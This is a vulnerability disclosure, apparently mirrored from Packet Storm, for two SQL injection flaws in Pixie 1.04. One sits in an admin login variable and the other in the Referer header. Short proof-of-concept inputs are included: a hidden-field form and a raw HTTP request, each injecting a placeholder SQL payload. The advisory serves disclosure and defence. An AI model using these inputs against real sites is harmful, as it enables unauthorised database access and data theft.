Lucene search
K

Pixie 1.04 SQL Injection

🗓️ 20 Jan 2011 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

SQL Injection in Pixie 1.04, High Risk Level, Awaiting Vendor Response, PoC Availabl

Code
`==================================  
Vulnerability ID: HTB22786  
Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie_1.html  
Product: Pixie  
Vendor: Lucid Crew ( http://www.getpixie.co.uk/ )   
Vulnerable Version: 1.04  
Vendor Notification: 06 January 2011   
Vulnerability Type: SQL Injection  
Status: Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/admin/index.php" script to properly sanitize user-supplied input in "GLOBALS['pixie_user']" variable when register_globals is on.  
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
  
The following PoC is available:  
  
  
<form action="http://[host]/admin/index.php" method="post" name="main" >  
<input name="username" value="1" type="hidden">  
<input name="password" value="1" type="hidden">  
<input name="login_submit" value="1" type="hidden">  
<input name="GLOBALS[pixie_user]" value="123'SQL_CODE_HERE" type="hidden">  
<input type="submit" value="submit" name="submit" />  
</form>  
  
  
==================================  
Vulnerability ID: HTB22785  
Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie.html  
Product: Pixie  
Vendor: Lucid Crew ( http://www.getpixie.co.uk/ )   
Vulnerable Version: 1.04  
Vendor Notification: 06 January 2011   
Vulnerability Type: SQL Injection  
Status: Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "referer" variable.  
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.  
  
The following PoC is available:  
  
  
GET / HTTP/1.1  
Referer: http://123'SQL_CODE_HERE  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
22